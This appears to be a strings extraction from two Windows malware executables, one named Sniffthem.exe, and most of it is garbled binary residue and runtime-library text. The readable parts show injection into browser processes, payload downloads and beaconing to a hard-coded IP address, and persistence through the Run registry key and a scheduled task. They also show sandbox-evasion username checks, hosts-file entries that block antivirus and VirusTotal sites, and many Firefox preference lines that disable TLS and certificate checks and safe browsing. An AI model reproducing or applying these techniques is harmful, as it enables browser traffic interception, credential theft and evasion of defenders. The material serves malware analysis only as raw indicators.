!This program cannot be run in DOS mode.
W/Rich
`.rdata
@.data
.pdata
@.rsrc
@.reloc
HcA<D9
@USVWH
UVWAVAWH
A_A^_^]
@USVWATAVAWH
fD9$Au
A_A^A\_^[]
fD94zu
WAVAWH
A_A^_
SVWAVH
8A^_^[
SVWAVAWH
0A_A^_^[
\$ UVWATAUAVAWH
PA_A^A]A\_^]
u7H!D$(H
D$D9D$@u H
<9A|,H
UATAUAVAWH
A_A^A]A\]
@USVWAVH
PA^_^[]
\$ UVWH
HcA<H
@SVWATAUAVAWH
`A_A^A]A\_^[
tE@8=Q
WATAUAVAWH
L96tmH
0A_A^A]A\_
UVWATAUAVAWH
@A_A^A]A\_^]
UVWAVAWH
0A_A^_^]
@SVWAVAWH
fD9|$0u
@A_A^_^[
tzH91uu
l$ VWAVH
fB9<Bu
CD$ M;
UAVAWH
H9t$8r
H9t$8r
H9t$8r
H9t$8r
H9t$8r
H9t$8r
H9t$8r
H9t$8r
H9t$8r
H9t$8r
H9t$8r
H9t$8r
H9t$8r
H9t$8r
H9t$8r
H9t$8r
H9t$8r
H9t$8r
H9t$8r
H;\$Pt
H;|$Pu
t$@@8u
UWATAUAVH
fF94Bu
t$ fD93u
fF94Cu
t$ fD9
fF94@u
A^A]A\_]
UAVAWH
fF94@u
fF94@u
t+fD9u
fF94@u
f9\$@t
UVWATAUAVAWH
A_A^A]A\_^]
UAVAWH
UAVAWH
UXH9upH
T$xH9u
U8H9uPH
UWATAVAWH
H9wxu"H
A_A^A\_]
toH9Kxu
@SUVWAVH
0A^_^][
\$ VWAVH
WATAUAVAWH
0A_A^A]A\_
UAVAWH
@USVWATAVAWH
A_A^A\_^[]
SUVWATAVAWH
A_A^A\_^][
SUVWATAVAWH
A_A^A\_^][
@SUVWAVH
A^_^][
UVWAVAWH
A_A^_^]
x ATAVAWH
0A_A^A\
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
ATAVAWH
t$ @82u
A_A^A\
fE94@u
WATAUAVAWH
PA_A^A]A\_
WATAUAVAWH
A_A^A]A\_
toH91uj
H!p H!p(I
WAVAWH
A_A^_
WAVAWH
T$XH;T$`t D
WATAUAVAWH
A_A^A]A\_
@VWAVH
UAVAWH
toH91uj
L9L$(L
UVWAVAWH
A_A^_^]
teH9Kxu
L9}'sA
UVWAVAWH
D8:u2H
A_A^_^]
D9>tXA
l$ VWAVH
fffffff
ATAVAWH
A_A^A\
\$ UVWATAUAVAWH
A_A^A]A\_^]
A:8uiI
t"A88t
@8l$8t
l$ VWAVH
r9\$ ~>L
l$ VWAUAVAWH
L$$fA;
u$HcG$H;
t5f9(t
A_A^A]_^
AUAVAWH
0A_A^A]
SVWAVH
8A^_^[
s WATAUAVAWH
9t$P~.8\$vt(H
9t$P~98\$vt3H
A_A^A]A\_
WAVAWH
A_A^_
WATAUAVAWH
A_A^A]A\_
VWATAVAWH
A_A^A\_^
x ATAVAWH
A_A^A\
x UAVAWH
x ATAUAWH
@A_A]A\
VWATAVAWH
A_A^A\_^
UVWATAUAVAWH
A_A^A]A\_^]
D8eoupH
UVWATAUAVAWH
pA_A^A]A\_^]
WATAUAVAWH
A_A^A]A\_
AUAVAWH
0A_A^A]
@SVWATAUAVAWH
L!|$@L!
D$HHcH
A_A^A]A\_^[
SVWATAUAVAWH
0A_A^A]A\_^[
WATAVH
@A^A\_
WAVAWH
fD9>u"
0A_A^_
@UATAUAVAWH
!t$(H!t$ I
A_A^A]A\]
l$ VWATAVAWH
T$&@8t$&t9@8r
A81t@@8r
A_A^A\_^
WAVAWH
fE98t'
0A_A^_
@SUVWATAUAVAWH
A_A^A]A\_^][
;Cu1f9K
f93t M;
L$ SUVWH
|$ ATAVAWH
0A_A^A\
WATAUAVAWH
0A_A^A]A\_
\$ UVWATAUAVAWH
^fD9+t
A_A^A]A\_^]
\$ UVWATAUAVAWH
A_A^A]A\_^]
fD9|$bu
H9L$Ht8H
Genuua
ineIuY
nteluQ3
WATAUAVAWH
@A_A^A]A\_
t$ WAVAWH
WATAUAVAWH
A_A^A]A\_
@SUVWATAVAWH
zu|D!t$ E3
A_A^A\_^][
UAVAWH
` AUAVAWH
t$HHc0I
\$0D9=
A_A^A]
t$ WATAUAVAW
A_A^A]A\_
VWATAVAWH
xv;=6F
A_A^A\_^
VWATAVAWH
A_A^A\_^
\$ UVWATAUAVAWH
!|$HHc
|$HD9l$X
HcD$LH;
HcD$LH;
H!|$ L
A_A^A]A\_^]
@UATAUAVAWH
A_A^A]A\]
D82u&H
D8t$Ht
Hct$PH
seHcD$XH
fD9!u:A
fD93tSH
CfD93u
H3E H3E
WATAUAVAWH
gfffffffH
D8L$Ht
A_A^A]A\_
x AUAVAWH
A_A^A]
@SUVWH
@SUVWH
@SUVWAVH
A^_^][
x ATAVAWH
D8&t4H
D8d$Ht
A_A^A\
ATAVAWH
D8d$8t
@A_A^A\
|$ ;=V
t$ WATAUAVAW
A_A^A]A\_
VWATAVAWH
A_A^A\_^
t$ WATAUAVAWH
0A_A^A]A\_
VWATAVAWH
0A_A^A\_^
UATAUAVAWH
A_A^A]A\]
WATAUAVAWH
A_A^A]A\_
f9.uVH
f9.u"H
tVf91tQH
x ATAVAWH
A_A^A\
@SUVWATAVAWH
3fD9 t
A_A^A\_^][
LcA<E3
@SUVWATAVAWH
PA_A^A\_^][
@UATAUAVAWH
A_A^A]A\]
UVWATAUAVAWH
A_A^A]A\_^]
D$DD9T$`
|$h+t$D+
WAVAWH
A_A^_
WATAUAVAWH
A_A^A]A\_
USVWATAUAVAWH
8UXt#D
XA_A^A]A\_^[]
` AUAVAWH
0A_A^A]
@USVWH
UVWATAUAVAWH
A_A^A]A\_^]
D8t$8t
|$ UATAUAVAWH
A_A^A]A\]
|$ UATAUAVAWH
A_A^A]A\]
UVWATAUAVAWH
A_A^A]A\_^]
UVWATAUAVAWH
A_A^A]A\_^]
x AUAVAWH
A_A^A]
UVWATAUAVAWH
A_A^A]A\_^]
x AUAVAWH
A_A^A]
H(H9J(u
permission denied
file exists
no such device
filename too long
device or resource busy
io error
directory not empty
invalid argument
no space on device
no such file or directory
function not supported
no lock available
not enough memory
resource unavailable try again
cross device link
operation canceled
too many files open
permission_denied
address_in_use
address_not_available
address_family_not_supported
connection_already_in_progress
bad_file_descriptor
connection_aborted
connection_refused
connection_reset
destination_address_required
bad_address
host_unreachable
operation_in_progress
interrupted
invalid_argument
already_connected
too_many_files_open
message_size
filename_too_long
network_down
network_reset
network_unreachable
no_buffer_space
no_protocol_option
not_connected
not_a_socket
operation_not_supported
protocol_not_supported
wrong_protocol_type
timed_out
operation_would_block
address family not supported
address in use
address not available
already connected
argument list too long
argument out of domain
bad address
bad file descriptor
bad message
broken pipe
connection aborted
connection already in progress
connection refused
connection reset
destination address required
executable format error
file too large
host unreachable
identifier removed
illegal byte sequence
inappropriate io control operation
invalid seek
is a directory
message size
network down
network reset
network unreachable
no buffer space
no child process
no link
no message available
no message
no protocol option
no stream resources
no such device or address
no such process
not a directory
not a socket
not a stream
not connected
not supported
operation in progress
operation not permitted
operation not supported
operation would block
owner dead
protocol error
protocol not supported
read only file system
resource deadlock would occur
result out of range
state not recoverable
stream timeout
text file busy
timed out
too many files open in system
too many links
too many symbolic link levels
value too large
wrong protocol type
bad allocation
0123456789abcdefghijklmnopqrstuvwxyz
0123456789abcdefghijklmnopqrstuvwxyz
0123456789abcdefABCDEF
Unknown exception
bad exception
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
CorExitProcess
(null)
`h````
xpxxxx
GetCurrentPackageId
UTF-16LE
UNICODE
_hypot
_nextafter
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
MessageBoxW
GetActiveWindow
GetLastActivePopup
GetUserObjectInformationW
GetProcessWindowStation
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__clrcall
__eabi
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
`h`hhh
xppwpp
CreateFile2
1#SNAN
1#QNAN
\Mb=Lk
Kagj(h
generic
unknown error
iostream
iostream stream error
system
kernel32
CreateProcessInternalW
RtlCreateProcessParametersEx
ntdll.dll
NtCreateProcessEx
NtCreateThreadEx
NtQueryInformationFile
NtQuerySystemInformation
NtSuspendProcess
NtResumeProcess
invalid string position
string too long
SeDebugPrivilege
vector<T> too long
ReflectiveLoader
firefox.exe
chrome.exe
msedge.exe
opera.exe
bad locale name
ios_base::badbit set
ios_base::failbit set
ios_base::eofbit set
{%08lX%04lX%lu}
CreateProcess failed (
Software\Microsoft\Windows\CurrentVersion\Run
Failed to open registry key.
Failed to set registry value.
Services
bad cast
NtWriteFile
NtMapViewOfSection
RtlInitUnicodeString
NtSetInformationFile
NtClose
NtOpenFile
NtCreateSection
RtlAdjustPrivilege
NtSetInformationProcess
ntdll.dll
wsprintfA
USER32.dll
OLEAUT32.dll
PathFindFileNameW
SHLWAPI.dll
OpenProcessToken
LookupPrivilegeValueA
AdjustTokenPrivileges
GetUserNameW
GetTokenInformation
RegSetValueExA
RegOpenKeyExA
RegOpenKeyExW
RegCloseKey
RegSetValueExW
ADVAPI32.dll
InternetOpenW
HttpQueryInfoA
InternetOpenUrlW
InternetReadFile
InternetCloseHandle
WININET.dll
SHGetFolderPathW
SHGetFolderPathA
SHELL32.dll
GetThreadContext
GetTempFileNameW
GetFileSize
SetThreadContext
SetFilePointer
GetCurrentProcess
WaitForSingleObject
WriteFile
OpenProcess
GetSystemDirectoryW
LoadLibraryW
GetModuleFileNameW
CreateFileW
GetTempPathW
GetLastError
GetProcAddress
VirtualAllocEx
LoadLibraryA
GetModuleHandleA
Wow64SetThreadContext
CloseHandle
WriteProcessMemory
ResumeThread
Wow64GetThreadContext
CreateThread
HeapAlloc
GetProcessHeap
Process32First
CreateRemoteThread
Process32Next
CreateToolhelp32Snapshot
VirtualProtectEx
ExitProcess
FindFirstFileW
MapViewOfFile
UnmapViewOfFile
SetEndOfFile
CreateProcessW
CompareFileTime
VirtualFree
GetWindowsDirectoryA
GetProcessTimes
GetVolumeInformationA
CopyFileW
TerminateProcess
ReadFile
lstrcatA
CreateDirectoryA
VirtualAlloc
CopyFileA
SetFileAttributesA
FindClose
Process32FirstW
CreateFileMappingA
IsWow64Process
GetModuleFileNameA
Process32NextW
CreateMutexA
IsDebuggerPresent
FindNextFileW
DeleteFileW
SetFileAttributesW
ExpandEnvironmentStringsW
MultiByteToWideChar
WideCharToMultiByte
LocalFree
GetStringTypeW
EncodePointer
DecodePointer
EnterCriticalSection
LeaveCriticalSection
InitializeCriticalSectionEx
DeleteCriticalSection
GetLocaleInfoEx
HeapFree
GetCPInfo
IsProcessorFeaturePresent
GetSystemTimeAsFileTime
GetCommandLineW
RtlLookupFunctionEntry
RtlUnwindEx
RtlPcToFileHeader
RaiseException
InitializeCriticalSectionAndSpinCount
IsValidCodePage
GetACP
GetOEMCP
SetLastError
GetCurrentThreadId
GetModuleHandleExW
GetStdHandle
HeapSize
GetFileType
InitOnceExecuteOnce
GetStartupInfoW
SetFilePointerEx
FlushFileBuffers
GetConsoleCP
GetConsoleMode
RtlCaptureContext
RtlVirtualUnwind
UnhandledExceptionFilter
SetUnhandledExceptionFilter
FlsAlloc
FlsGetValue
FlsSetValue
FlsFree
GetModuleHandleW
QueryPerformanceCounter
GetTickCount64
GetEnvironmentStringsW
FreeEnvironmentStringsW
GetUserDefaultLocaleName
LCMapStringEx
IsValidLocaleName
EnumSystemLocalesEx
HeapReAlloc
LoadLibraryExW
OutputDebugStringW
ReadConsoleW
SetStdHandle
WriteConsoleW
KERNEL32.dll
Sniffthem.exe
.?AV_com_error@@
.?AVbad_alloc@std@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AV_Locimp@locale@std@@
.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@
.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_filebuf@DU?$char_traits@D@std@@@std@@
.?AV?$codecvt@DDH@std@@
Copyright (c) 1992-2004 by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.
.?AVtype_info@@
.?AVbad_exception@std@@
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AV_Iostream_error_category@std@@
.?AV_System_error_category@std@@
.?AVerror_category@std@@
.?AV_Generic_error_category@std@@
!This program cannot be run in DOS mode.
*XRich
`.rdata
@.data
@.reloc
CE SPW
L$$_^3
QQSVWd
Genuu_
ineIuV
nteluM3
uPVWhQ^@
~pjCXf
j@j _W
QQSVWh
j"_f9y
Ht Hu4j
URPQQh0
;t$,v-
UQPXY]Y[
PP9E u
x$;5$-A
x&;5$-A
~';_t|%3
xy;5$-A
permission denied
file exists
no such device
filename too long
device or resource busy
io error
directory not empty
invalid argument
no space on device
no such file or directory
function not supported
no lock available
not enough memory
resource unavailable try again
cross device link
operation canceled
too many files open
permission_denied
address_in_use
address_not_available
address_family_not_supported
connection_already_in_progress
bad_file_descriptor
connection_aborted
connection_refused
connection_reset
destination_address_required
bad_address
host_unreachable
operation_in_progress
interrupted
invalid_argument
already_connected
too_many_files_open
message_size
filename_too_long
network_down
network_reset
network_unreachable
no_buffer_space
no_protocol_option
not_connected
not_a_socket
operation_not_supported
protocol_not_supported
wrong_protocol_type
timed_out
operation_would_block
address family not supported
address in use
address not available
already connected
argument list too long
argument out of domain
bad address
bad file descriptor
bad message
broken pipe
connection aborted
connection already in progress
connection refused
connection reset
destination address required
executable format error
file too large
host unreachable
identifier removed
illegal byte sequence
inappropriate io control operation
invalid seek
is a directory
message size
network down
network reset
network unreachable
no buffer space
no child process
no link
no message available
no message
no protocol option
no stream resources
no such device or address
no such process
not a directory
not a socket
not a stream
not connected
not supported
operation in progress
operation not permitted
operation not supported
operation would block
owner dead
protocol error
protocol not supported
read only file system
resource deadlock would occur
result out of range
state not recoverable
stream timeout
text file busy
timed out
too many files open in system
too many links
too many symbolic link levels
value too large
wrong protocol type
bad allocation
Unknown exception
CorExitProcess
GetCurrentPackageId
bad exception
MessageBoxW
GetActiveWindow
GetLastActivePopup
GetUserObjectInformationW
GetProcessWindowStation
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__clrcall
__eabi
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
generic
unknown error
iostream
iostream stream error
system
SeDebugPrivilege
firefox.exe
string too long
invalid string position
vector<T> too long
ReflectiveLoader
InternetOpenW
HttpQueryInfoA
InternetOpenUrlW
InternetReadFile
InternetCloseHandle
WININET.dll
OpenProcessToken
LookupPrivilegeValueA
AdjustTokenPrivileges
ADVAPI32.dll
HeapAlloc
GetCurrentProcess
Process32First
WaitForSingleObject
GetProcessHeap
OpenProcess
Process32Next
CreateToolhelp32Snapshot
CloseHandle
CreateRemoteThread
VirtualProtectEx
VirtualAllocEx
WriteProcessMemory
EncodePointer
DecodePointer
GetCommandLineW
RaiseException
RtlUnwind
IsDebuggerPresent
IsProcessorFeaturePresent
GetLastError
InterlockedDecrement
ExitProcess
GetModuleHandleExW
GetProcAddress
MultiByteToWideChar
HeapSize
GetStdHandle
WriteFile
GetModuleFileNameW
HeapFree
SetLastError
InterlockedIncrement
GetCurrentThreadId
GetFileType
InitializeCriticalSectionAndSpinCount
DeleteCriticalSection
InitOnceExecuteOnce
GetStartupInfoW
QueryPerformanceCounter
GetSystemTimeAsFileTime
GetTickCount64
GetEnvironmentStringsW
FreeEnvironmentStringsW
UnhandledExceptionFilter
SetUnhandledExceptionFilter
FlsAlloc
FlsGetValue
FlsSetValue
FlsFree
TerminateProcess
GetModuleHandleW
EnterCriticalSection
LeaveCriticalSection
LoadLibraryExW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
HeapReAlloc
OutputDebugStringW
LoadLibraryW
WideCharToMultiByte
LCMapStringEx
GetStringTypeW
FlushFileBuffers
GetConsoleCP
GetConsoleMode
SetStdHandle
SetFilePointerEx
WriteConsoleW
CreateFileW
KERNEL32.dll
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVtype_info@@
.?AVbad_exception@std@@
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AV_Iostream_error_category@std@@
.?AV_System_error_category@std@@
.?AVerror_category@std@@
.?AV_Generic_error_category@std@@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
1,282W2d2t2
2 3+323?3Z3
354<4I4[4t4}4
7J92:O<Y<s=}=
0`1`2M3
8I9c9y9
:7:R:m:
;1;<;_;j;v;
>7>U>\>`>d>h>l>p>t>x>
>:?E?`?g?l?p?t?
0^0d0h0l0p0
2K2R2Z2
3F6g6r6x6
;!<(<,<0<4<8<<<@<D<
3<3^3t3
374A4H4[4
5$5.5>5N5^5g5w5
627:7M7X7]7o7z7
7Y8p8}8
9#9(94999X9
:8:>:~:
=K=c=m=
>&?<?B?T?
0!0&0}0
7 7,71777K7Y7e7}7
9=:I:O:U:[:
=(=3=Q=m=u=z=
=!>)>4>9>T>Y>x>
?/?8???H?O?f?|?
O0Z0`0
[0x0~0
1?1N1U1
5/666K6U6
7-9?9y9
9M:]:s:
;+;2;Y;
>X>^>j>
2'2-232;2A2G2O2U2[2c2l2s2{2
8#828<8b8
1'191K1]1o1
1C6d6k6
797Y7n7x7
8@9S9c9
0>1H1N1b1n1
333U3\3
8)8/848<8B8b8
8#9B9b9q9
T1X1\1h1l1p1t1x1
2$2,242<2D2L2T2\2d2l2t2|2
3$3,343<3D3L3T3\3d3l3t3|3
4$4,444<4D4L4T4\4d4l4t4|4
5$5,545<5D5L5T5\5d5l5t5|5
6$6,646<6D6L6T6\6d6
? ?$?(?,?0?4?8?<?@?D?H?L?P?T?X?\?`?d?h?l?p?
$0,040<0D0L0T0\0d0l0t0|0
0\;`;d;h;|;
;8<<<@<D<H<L<P<T<X<\<`<d<h<l<p<t<x<|<
= =$=(=,=0=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=t=x=|=
l0p0x0
1 1(1@1P1T1d1h1l1p1x1
2(282<2L2P2`2d2h2p2
3 30343D3H3L3T3l3|3
4 444<4P4X4l4t4|4
5 5@5`5
60686<6X6`6d6|6
7 7(70747<7P7p7
808<8X8x8
9$9,9p9
: :0:<:\:d:l:x:
080X0x0
489<9@9D9H9L9P9T9X9\9`9d9h9l9p9t9x9|9
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
;$;0;4;8;<;`;h;
> >$>(>,>8><>@>D>H>L>P>T>\>`>p>
?,?0?4?
.?AVsystem_error@std@@
.?AVbad_cast@std@@
.?AV?$basic_filebuf@_WU?$char_traits@_W@std@@@std@@
.?AVexception@std@@
.?AVcodecvt_base@std@@
.?AV?$codecvt@_WDH@std@@
.?AV?$basic_istream@_WU?$char_traits@_W@std@@@std@@
.?AVios_base@std@@
.?AV?$basic_ofstream@_WU?$char_traits@_W@std@@@std@@
.?AV?$ctype@_W@std@@
.?AVfailure@ios_base@std@@
.?AVruntime_error@std@@
.?AV?$ctype@D@std@@
.?AV?$basic_ostream@_WU?$char_traits@_W@std@@@std@@
.?AV?$numpunct@D@std@@
.?AV?$_Iosb@H@std@@
.?AV?$basic_ifstream@_WU?$char_traits@_W@std@@@std@@
.?AV?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@
.?AV_Facet_base@std@@
.?AUctype_base@std@@
.?AV?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@
.?AVfacet@locale@std@@
.?AV?$basic_ios@_WU?$char_traits@_W@std@@@std@@
((((( H
h(((( H
H
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
LC_ALL
LC_COLLATE
LC_CTYPE
LC_MONETARY
LC_NUMERIC
LC_TIME
mscoree.dll
- floating point support not loaded
- not enough space for arguments
- not enough space for environment
- abort() has been called
- not enough space for thread data
- unexpected multithread lock error
- unexpected heap error
- unable to open console device
- not enough space for _onexit/atexit table
- pure virtual function call
- not enough space for stdio initialization
- not enough space for lowio initialization
- unable to initialize heap
- CRT not initialized
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
- not enough space for locale information
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
- inconsistent onexit begin-end variables
DOMAIN error
SING error
TLOSS error
runtime error
Runtime Error!
Program:
<program name unknown>
Microsoft Visual C++ Runtime Library
(null)
kernel32.dll
UTF-16LE
UNICODE
american
american english
american-english
australian
belgian
canadian
chinese
chinese-hongkong
chinese-simplified
chinese-singapore
chinese-traditional
dutch-belgian
english-american
english-aus
english-belize
english-can
english-caribbean
english-ire
english-jamaica
english-nz
english-south africa
english-trinidad y tobago
english-uk
english-us
english-usa
french-belgian
french-canadian
french-luxembourg
french-swiss
german-austrian
german-lichtenstein
german-luxembourg
german-swiss
irish-english
italian-swiss
norwegian
norwegian-bokmal
norwegian-nynorsk
portuguese-brazilian
spanish-argentina
spanish-bolivia
spanish-chile
spanish-colombia
spanish-costa rica
spanish-dominican republic
spanish-ecuador
spanish-el salvador
spanish-guatemala
spanish-honduras
spanish-mexican
spanish-modern
spanish-nicaragua
spanish-panama
spanish-paraguay
spanish-peru
spanish-puerto rico
spanish-uruguay
spanish-venezuela
swedish-finland
america
britain
england
great britain
holland
hong-kong
new-zealand
pr china
pr-china
puerto-rico
slovak
south africa
south korea
south-africa
south-korea
trinidad & tobago
united-kingdom
united-states
USER32.DLL
CONOUT$
gNIKMOK
Mozilla/5.0
Taskmgr.exe
ProcessHacker.exe
firefox.exe
http://176.111.174.140/api/update32.pack
chrome.exe
msedge.exe
opera.exe
http://176.111.174.140/api/update.pack
http://176.111.174.140/api/update2.pack
relog.exe
%SystemRoot%\system32\relog.exe
george
Darrel Jones
John Zalinsky
John Doe
SHCtAGa3rm
UV0U6479boGY
8wjXNBz
WALKER
oxYT3lZggZMK
t3wObOwwaW
jaakw.q
sMdVVcp
06AAy3
mLfaNLLP
JPQlavKFb0Lt0
7HV8BUt5BIsCZ
aFgxGd9fq4Iv8
wdagutilityaccount
WDAGUtilityAccount
hal9th
malware
sandbox
sample
currentuser
hapubws
hong lee
it-admin
johnson
miller
milozs
microsoft
sand box
maltest
schtasks /create /tn "SystemServicesTools" /tr "
" /sc onstart /f
Unknown
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789
Software\Microsoft\Windows\CurrentVersion\Run
\Service_
" /tr "
schtasks /create /tn "
Service_
SystemUpdate.exe
https://176.111.174.140/event.php
http://176.111.174.140/event.php
explorer.exe
\Mozilla\Firefox\Profiles\
release
\drivers\etc\hosts
virustotal
www.malwarebytes.com
en.malwarebytes.com
fr.malwarebytes.com
es.malwarebytes.com
www.avast.com
www.avg.com
www.avira.com
www.360totalsecurity.com
www.bitdefender.com
www.eset.com
www.norton.com
wdcp.microsoft.com
wdcpalt.microsoft.com
wdprod.microsoft.com
wdcpes.microsoft.com
www.mcafee.com
www.comodo.com
www.virustotal.com
0.0.0.0
\prefs.js
user_pref("network.http.http2.enabled", false);
user_pref("network.http.http3.enable", false);
user_pref("network.http.version", 1);
user_pref("network.http.http4.enable", false);
user_pref("network.trr.no_warn_on_network_change", true);
user_pref("network.http.max_response_headers_kb", -1);
user_pref("network.http.enforce-framing.strict_chunked_encoding", false);
user_pref("network.http.response.timeout", -1);
user_pref("network.trr.send_empty_accept-encoding_headers", true);
user_pref("network.auth.non-web-content-triggered-resources-http-auth-allow", true);
user_pref("security.csp.enable", false);
user_pref("security.xss_detection.main_thread_script_filter", false);
user_pref("security.mixed_content.block_display_content", false);
user_pref("security.mixed_content.block_object_subrequest", false);
user_pref("security.fileuri.strict_origin_policy", false);
user_pref("security.fileuri.origin_policy", 0);
user_pref("security.sri.enable", false);
user_pref("privacy.firstparty.isolate", false);
user_pref("browser.xul.error_pages.expert_bad_cert", true);
user_pref("browser.ssl_override_behavior", 1);
user_pref("browser.safebrowsing.downloads.remote.enabled", false);
user_pref("security.tls.insecure_fallback_hosts.use_static_list", false);
user_pref("security.tls.version.min", 1);
user_pref("security.tls.version.max", 4);
user_pref("security.tls.version.fallback-limit", 4);
user_pref("security.tls.insecure_alerts", false);
user_pref("security.ssl.enable_ocsp_stapling", false);
user_pref("security.OCSP.require", false);
user_pref("security.cert_pinning.enforcement_level", 0);
user_pref("browser.safebrowsing.downloads.remote.url", "");
user_pref("browser.safebrowsing.malware.enabled", false);
user_pref("browser.safebrowsing.phishing.enabled", false);
user_pref("privacy.trackingprotection.enabled", false);
user_pref("privacy.donottrackheader.enabled", false);
user_pref("dom.security.https_only_mode", false);
user_pref("security.enterprise_roots.enabled", true);
user_pref("security.ssl.errorReporting.enabled", false);
user_pref("security.ssl.errorReporting.url", "");
user_pref("security.ssl.enable_false_start", true);
user_pref("security.ssl.require_safe_negotiation", false);
user_pref("security.ssl.treat_unsafe_negotiation_as_broken", false);
user_pref("security.ssl3.ecdhe_ecdsa_rc4_128_sha", false);
user_pref("security.ssl3.ecdhe_rsa_rc4_128_sha", false);
user_pref("security.ssl3.rsa_rc4_128_md5", false);
user_pref("security.ssl3.rsa_rc4_128_sha", false);
user_pref("security.tls.version.enable-deprecated", true);
user_pref("security.warn_entering_weak", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("network.http.spdy.enabled.v3-1", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled", false);
user_pref("browser.tabs.remote.autostart", false);
user_pref("browser.tabs.remote.autostart.2", false);
user_pref("gfx.direct2d.disabled", true);
user_pref("layers.acceleration.disabled", true);
user_pref("network.stricttransportsecurity.preloadlist", false);
network.http.spdy.enabled.v3-1
user_pref("network.http.spdy.enabled.v3-1", false);
